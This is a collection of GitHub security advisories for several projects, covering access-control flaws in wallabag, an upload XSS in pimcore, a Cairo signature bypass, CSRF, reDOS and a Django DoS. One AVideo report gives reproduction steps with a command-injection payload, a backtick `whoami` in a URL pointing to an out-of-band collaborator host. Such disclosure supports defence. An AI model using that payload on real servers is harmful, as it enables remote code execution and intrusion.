ghsa

### Impact The annotations feature lets users add annotations on highlighted parts of an entry. The controller does not validate authorization on `PUT` and `DELETE` requests which lets a logged user modify or delete any annotation using their ID on their endpoints `example.org/annotations/{id}`. These vulnerable requests also disclose highlighted parts of the entry to the attacker. You should immediately patch your instance to version 2.5.3 or higher if you have more than one user and/or having open registration. ### Resolution A user check is now done in the vulnerable methods before applying change on an annotation. The Annotation retrieval through a `ParamConverter` has also been replaced with a call to the `AnnotationRepository` in order to prevent any information disclosure through response discrepancy. ### Workarounds ### Credits We would like to thank @bAuh0lz for reporting this issue through huntr.dev. Reference: https://huntr.dev/bounties/8fdd9b31-d89b-4bbe-9557-20...

# Description The export feature lets a user export a single entry or a set of entries in a given format (_e.g. PDF, MOBI, TXT_). For example, `https://yourinstance.wallabag.org/export/45.pdf` will export the entry with id 45 in PDF format. Since wallabag 2.0.0-alpha.1, this feature is vulnerable to an insecure direct object reference attack. A logged user can export any single entry without ownership validation. This is due to a lack of access validation in the `downloadEntryAction` method. **You should immediately patch your instance to version 2.5.3 or higher if you have more than one user and/or having open registration.** # Resolution A user check is now done in the vulnerable method before sending the exported entry. The `Entry` retrieval through a `ParamConverter` has also been replaced with a call to the `EntryRepository` in order to prevent any information disclosure through response discrepancy. # Workaround If you are unable to update to the latest version or if yo...

### Impact The upload functionality for updating user profile does not properly validate the file content-type, allowing any authenticated user to bypass this security check by adding a valid signature (p.e. GIF89) and sending any invalid content-type. This could allow an authenticated attacker to upload HTML files with JS content that will be executed in the context of the domain. ### Patches Update to version 10.5.16 or apply this patch manually https://github.com/pimcore/pimcore/pull/14125.patch

### Cause `is_valid_eth_signature` is missing a call to `finalize_keccak` after calling `verify_eth_signature`. ### Impact As a result, any contract using `is_valid_eth_signature` from the account library (such as the `EthAccount` preset) is vulnerable to a malicious sequencer. Specifically, the malicious sequencer would be able to bypass signature validation to impersonate an instance of these accounts. ### Risk In order to exploit this vulnerability, it is required to control a sequencer or prover since they're the ones executing the hints, being able to inject incorrect keccak results. Today StarkWare is the only party running both a prover or a sequencer, greatly reducing the risk of exploit. ### Patches The issue has been patched in 0.6.1. ### For more information If you have any questions or comments about this advisory: * Open an issue in [the Contracts for Cairo repository](https://github.com/OpenZeppelin/cairo-contracts/issues/new/choose) * Email us at [security@openzepp...

Clockwork Web before 0.1.2, when used with Rails before 5.2 is used, allows Cross-Site Request Forgery (CSRF). A CSRF attack works by getting an authorized user to visit a malicious website and then performing requests on behalf of the user. In this instance, actions include enabling and disabling jobs. All users running an affected release on Rails < 5.2 should upgrade immediately.

A missing access check in the `InvitationController` allows an unauthenticated user to delete all frontend users.

A missing access check in the `InvitationController` allows an unauthenticated user with a valid invitation link to set the password of all frontend users.

### Impact Unsanitized input flows into Strategy match operation (EXIST), where it is used to build a regular expression. This may result in a Regular expression Denial of Service attack (reDOS). ### Patches Patched in 3.1.4 ### Workarounds Avoid using Strategy settings that use REGEX in conjunction with EXIST and NOT_EXIST operations.

Description: I found a very critical vulnerability on your open source program called RCE (Remote Code Execution) where an attacker can arbitrary execute code in the server Impact: An attacker could execute remote codes on your system Step to Reproduce: 1. Go to My Videos tab https://demo.avideo.com/mvideos 2. Click "Embed a video link" 3. Get your Burp Suite Collaborator link Example: [o4ta880iz4vap09kaqw400po8fe52u.oastify.com](http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com/) 4. Now put this RCE payload in the Video Link field [http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com?`whoami`](http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com/?whoami) then click Save 5. Now go to BurpSuite Collaborator client and see the response

In Django 3.2 before 3.2.17, 4.0 before 4.0.9, and 4.1 before 4.1.6, the parsed values of Accept-Language headers are cached in order to avoid repetitive parsing. This leads to a potential denial-of-service vector via excessive memory usage if the raw value of Accept-Language headers is very large.